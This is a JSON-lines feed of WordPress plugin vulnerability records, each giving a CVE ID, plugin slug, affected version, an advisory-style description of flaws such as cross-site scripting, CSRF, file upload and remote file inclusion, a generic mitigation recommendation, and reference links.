{"CVE_ID":"CVE-2024-6224","slug":"send-email-only-on-reply-to-my-comment","versionImpact":"1.0.6","description":"The Send email only on Reply to My Comment WordPress plugin through 1.0.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54457f1b-6572-4de0-9100-3433c715c5ce\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54457f1b-6572-4de0-9100-3433c715c5ce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13633","slug":"simple-catalogue","versionImpact":"1.0.2","description":"The Simple catalogue WordPress plugin through 1.0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4291d5eb-c006-42b0-accf-90f09f26b6a0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4291d5eb-c006-42b0-accf-90f09f26b6a0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13884","slug":"limit-bio","versionImpact":"1.0","description":"The Limit Bio WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/759a60ac-c890-4961-91e4-53db5096eb3c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/759a60ac-c890-4961-91e4-53db5096eb3c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0810","slug":"expand-maker","versionImpact":"3.4.5","description":"The Read More & Accordion plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.4.5. This is due to missing or incorrect nonce validation on the addNewButtons() function. This makes it possible for unauthenticated attackers to include and execute arbitrary PHP files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMoreInit.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMoreInit.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMorePages.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMorePages.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMorePages.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/expand-maker\\\/trunk\\\/classes\\\/ReadMorePages.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a963cd9b-9f8f-4bd2-92cd-74c5e85e1d96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a963cd9b-9f8f-4bd2-92cd-74c5e85e1d96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4170","slug":"xavins-review-ratings","versionImpact":"1.4.0","description":"The Xavin&#039;s Review Ratings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'xrr' shortcode in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xavins-review-ratings\\\/trunk\\\/xavins-review-ratings.php#L293\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xavins-review-ratings\\\/trunk\\\/xavins-review-ratings.php#L293\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c057a98-4a8d-408a-b6a4-3c322bfa0cdf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c057a98-4a8d-408a-b6a4-3c322bfa0cdf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7653","slug":"epaybg-payments","versionImpact":"0.1","description":"The EPay.bg Payments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'epay' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/epaybg-payments\\\/tags\\\/0.1\\\/epay-payments.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/epaybg-payments\\\/tags\\\/0.1\\\/epay-payments.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e35e79a-4838-4ed9-bd08-80e8f9043ec4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e35e79a-4838-4ed9-bd08-80e8f9043ec4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0447","slug":"youtube-channel","versionImpact":"3.0.12.1","description":"The My YouTube Channel plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the clear_all_cache function in versions up to, and including, 3.0.12.1. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to clear the plugin's cache.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2844200%40youtube-channel&new=2844200%40youtube-channel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2844200%40youtube-channel&new=2844200%40youtube-channel&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/486b6a75-d101-4f3a-8436-6c23dd0ff200\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/486b6a75-d101-4f3a-8436-6c23dd0ff200\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youtube-channel\\\/trunk\\\/youtube-channel.php?rev=2482795#L1502\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youtube-channel\\\/trunk\\\/youtube-channel.php?rev=2482795#L1502\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0078","slug":"resume-builder","versionImpact":"3.1.1","description":"The Resume Builder WordPress plugin through 3.1.1 does not sanitize and escape some parameters related to Resume, which could allow users with a role as low as subscriber to perform Stored XSS attacks against higher privilege users","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e667854f-56f8-4dbe-9573-6652a8aacc2c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e667854f-56f8-4dbe-9573-6652a8aacc2c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45829","slug":"newsletter-bulk-email","versionImpact":"2.0.1","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in HappyBox Newsletter & Bulk Email Sender \u2013 Email Newsletter Plugin for WordPress plugin <=\u00a02.0.1 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/newsletter-bulk-email\\\/wordpress-newsletter-bulk-email-sender-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/newsletter-bulk-email\\\/wordpress-newsletter-bulk-email-sender-plugin-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5141","slug":"bsk-contact-form-7-blacklist","versionImpact":"1.0.1","description":"The BSK Contact Form 7 Blacklist WordPress plugin through 1.0.1 does not sanitise and escape the inserted_count parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9997fe8d-8027-4ae0-9885-a1f5565f2d1a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9997fe8d-8027-4ae0-9885-a1f5565f2d1a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1693","slug":"sp-client-document-manager","versionImpact":"4.70","description":"The SP Project & Document Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cdm_save_category AJAX action in all versions up to, and including, 4.70. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary folder names that do not belong to them.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sp-client-document-manager\\\/trunk\\\/classes\\\/ajax.php#L786\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sp-client-document-manager\\\/trunk\\\/classes\\\/ajax.php#L786\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1951ad6c-17b5-44ae-85e2-376b99df742e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1951ad6c-17b5-44ae-85e2-376b99df742e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3563","slug":"genesis-blocks","versionImpact":"3.1.3","description":"The Genesis Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sharing block in all versions up to, and including, 3.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef21fae3-65ef-43e8-9792-619dfc4dfda8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef21fae3-65ef-43e8-9792-619dfc4dfda8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/genesis-blocks\\\/trunk\\\/src\\\/blocks\\\/block-sharing\\\/index.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/genesis-blocks\\\/trunk\\\/src\\\/blocks\\\/block-sharing\\\/index.php#L268\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6223","slug":"send-email-only-on-reply-to-my-comment","versionImpact":"1.0.6","description":"The Send email only on Reply to My Comment WordPress plugin through 1.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf7d1cea-0bf4-4b9e-bab4-71d5719a7c30\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf7d1cea-0bf4-4b9e-bab4-71d5719a7c30\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3944","slug":"wp-todo","versionImpact":"1.3.0","description":"The WP To Do plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b36b9b8a-41b0-4b57-92c7-5acebe2b0bae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b36b9b8a-41b0-4b57-92c7-5acebe2b0bae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L225\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7296","slug":"bigbluebutton","versionImpact":"3.0.0-beta.4","description":"The BigBlueButton plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the moderator code and viewer code fields in versions up to, and including, 3.0.0-beta.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with author privileges or higher to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f829d21-5347-46ec-9218-2b3cbe7d7b95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f829d21-5347-46ec-9218-2b3cbe7d7b95?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bigbluebutton\\\/trunk\\\/public\\\/partials\\\/bigbluebutton-join-display.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bigbluebutton\\\/trunk\\\/public\\\/partials\\\/bigbluebutton-join-display.php#L26\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13459","slug":"fusedesk","versionImpact":"6.6.1","description":"The FuseDesk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fusedesk_newcase' shortcode in all versions up to, and including, 6.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fusedesk\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fusedesk\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a69a99af-3d1d-4ad2-b6b5-e4fcea56be51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a69a99af-3d1d-4ad2-b6b5-e4fcea56be51?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13632","slug":"wp-extra-fields","versionImpact":"1.0.1","description":"The WP Extra Fields WordPress plugin through 1.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85c5b465-afce-4c68-b5e3-214ec4b5c9f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85c5b465-afce-4c68-b5e3-214ec4b5c9f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13604","slug":"kb-support","versionImpact":"1.7.4","description":"The KB Support \u2013 Customer Support Ticket & Helpdesk Plugin, Knowledge Base Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.4 via the 'kbs' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/kbs directory which can contain file attachments included in support tickets. The vulnerability was partially patched in version 1.7.3.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/files.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/files.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231596\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231596\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3a058d6-ca9e-4241-b6dd-307efa7689ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3a058d6-ca9e-4241-b6dd-307efa7689ab?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4168","slug":"subpage-view","versionImpact":"1.3.3","description":"The Subpage List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'subpages' shortcode in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subpage-view\\\/trunk\\\/inc\\\/class-subpage-list-shortcode.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subpage-view\\\/trunk\\\/inc\\\/class-subpage-list-shortcode.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aca48ddf-4256-4a55-bff5-1718110147dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aca48ddf-4256-4a55-bff5-1718110147dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6679","slug":"bit-form","versionImpact":"2.20.4","description":"The Bit Form builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.20.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. For this to be exploitable, the PRO version needs to be installed and activated as well. Additionally a form with an advanced file upload element needs to be published.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3343461%40bit-form%2Ftrunk&old=3336733%40bit-form%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3343461%40bit-form%2Ftrunk&old=3336733%40bit-form%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e2e294f-904b-4674-8baf-d3a9a260d634?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e2e294f-904b-4674-8baf-d3a9a260d634?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0446","slug":"youtube-channel","versionImpact":"3.0.12.1","description":"The My YouTube Channel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its settings parameters in versions up to, and including, 3.0.12.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2844200%40youtube-channel&new=2844200%40youtube-channel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2844200%40youtube-channel&new=2844200%40youtube-channel&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d979f899-8cdc-4230-b1b5-865c025dc86a\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d979f899-8cdc-4230-b1b5-865c025dc86a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0076","slug":"download-attachments","versionImpact":"1.2.24","description":"The Download Attachments WordPress plugin through 1.2.24 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0a44f8a-877c-40df-a3ba-b9b806ffb772\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0a44f8a-877c-40df-a3ba-b9b806ffb772\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7233","slug":"gigpress","versionImpact":"2.3.29","description":"The GigPress WordPress plugin through 2.3.29 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/585cb2f2-7adc-431f-89d4-4e947f16af18\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/585cb2f2-7adc-431f-89d4-4e947f16af18\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0386","slug":"weforms","versionImpact":"1.6.21","description":"The weForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Referer' HTTP header in all versions up to, and including, 1.6.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4083","slug":"fd-elementor-imagebox","versionImpact":"1.0.0","description":"The Easy Restaurant Table Booking plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation when saving settings. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1492440d-c6c8-46c0-bc88-c9e3f9933ad4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1492440d-c6c8-46c0-bc88-c9e3f9933ad4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fd-elementor-imagebox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fd-elementor-imagebox\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4936","slug":"canto","versionImpact":"3.0.8","description":"The Canto plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 3.0.8 via the abspath parameter. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. This required allow_url_include to be enabled on the target site in order to exploit.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95a68ae0-36da-499b-a09d-4c91db8aa338?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95a68ae0-36da-499b-a09d-4c91db8aa338?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/canto\\\/trunk\\\/includes\\\/lib\\\/sizes.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/canto\\\/trunk\\\/includes\\\/lib\\\/sizes.php#L15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6021","slug":"donations-block","versionImpact":"2.1.0","description":"The Donation Block For PayPal WordPress plugin through 2.1.0 does not sanitise and escape form submissions, leading to a stored cross-site scripting vulnerability","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9d83cffd-7dcd-4301-8d4d-3043b14e05b5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9d83cffd-7dcd-4301-8d4d-3043b14e05b5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
